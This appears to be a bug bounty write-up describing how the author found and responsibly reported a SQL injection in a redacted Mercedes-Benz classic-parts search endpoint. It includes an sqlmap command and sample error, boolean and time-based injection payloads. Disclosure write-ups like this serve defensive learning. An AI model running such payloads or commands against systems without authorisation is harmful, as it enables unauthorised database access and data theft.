How I Found a Critical SQL Injection in Mercedes-Benz πŸš—πŸ’¨

By Youssef Ezzat

Hello everyone! πŸ‘‹ My name is Youssef Ezzat, and I am a Cybersecurity Researcher and Bug Bounty Hunter. I've been diving deep into web security for a while now, and today I'm excited to share my very first write-up with the community.

This story is about how I discovered a critical SQL Injection (SQLi) vulnerability in one of Mercedes-Benz's domains during a Vulnerability Disclosure Program (VDP) engagement.

---

> Disclaimer

This vulnerability was reported responsibly to the Mercedes-Benz security team via Bugcrowd. It has been fixed and resolved. All sensitive details in this write-up, including specific subdomains, have been redacted.

None

The Reconnaissance:

I started my hunting session by picking a target from the Mercedes-Benz scope. My approach is usually to look for functionality that interacts with a databaseβ€”search bars, filters, and input fields are my best friends.

I came across a subdomain dealing with classic car parts:

https://β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ.mercedes-benz-classic.com

The website allowed users to search for specific parts, so I fired up Burp Suite to intercept the traffic and see what was happening behind the scenes.

The Discovery

I navigated to the search page and entered a random search term. The application was sending a POST request to:

POST /β–ˆβ–ˆβ–ˆ/search

The body contained several parameters, but one stood out:

β–ˆβ–ˆβ–ˆSearch[search_series]

Step 1: Breaking the Logic

I sent the request to Burp Repeater and added a single quote ' to the parameter:

β–ˆβ–ˆβ–ˆSearch[search_series]=teste'

Result:

The server responded with 500 Internal Server Error and leaked a verbose SQL error:

SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax...

πŸ”₯ This is the smoke that indicates a fire.

Step 2: Confirming the Injection

To confirm it wasn't a fluke, I tried injecting double quotes:

β–ˆβ–ˆβ–ˆSearch[search_series]=tester''

Result:

The server returned a 200 OK with normal content (No results found).

βœ”οΈ This confirmed the input was being interpreted by the database.

Step 3: Exploitation (Proof of Concept)

After confirming it manually, I used SQLMap to verify the severity and help the security team reproduce the issue.

SQLMap quickly identified:

Boolean-based blind SQLi

Error-based SQLi

Time-based blind SQLi

Backend DBMS: MySQL

This meant an attacker could potentially:

Dump entire database tables

Extract sensitive information

Enumerate schemas, tables, and columns

SQLMap Command Used (PoC)

sqlmap -u "https://β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ.mercedes-benz-classic.com/β–ˆβ–ˆβ–ˆ/search" \
--data="β–ˆβ–ˆβ–ˆSearch[search_series]=test" \
-p "β–ˆβ–ˆβ–ˆSearch[search_series]" --risk=3 --level=5 --batch

πŸ§ͺ Payloads Used

Error Test

teste'

Fixing Query

tester''

Boolean-Based

test' AND 1=1 --

Time-Based

test' AND SLEEP(5) --

---

Vulnerable Parameter:

β–ˆβ–ˆβ–ˆSearch[search_series]

---

πŸŽ‰ Conclusion

Finding a vulnerability in a giant like Mercedes-Benz was a thrilling experience for me. It reinforced the importance of sanitizing user input, especially in search functionalities.

This journey is just beginning. I learned a lot from this finding, and I can't wait to share more bugs with you all in the future.

If you enjoyed this write-up, feel free to follow me for more security content!

https://www.linkedin.com/in/youssef-ezzat2025 Happy Hacking! πŸ’»πŸ•΅οΈβ€β™‚οΈ

#BugBounty #Cybersecurity #Hacking #AppSec #Infosec #SqlInjection #Mercedes-Benz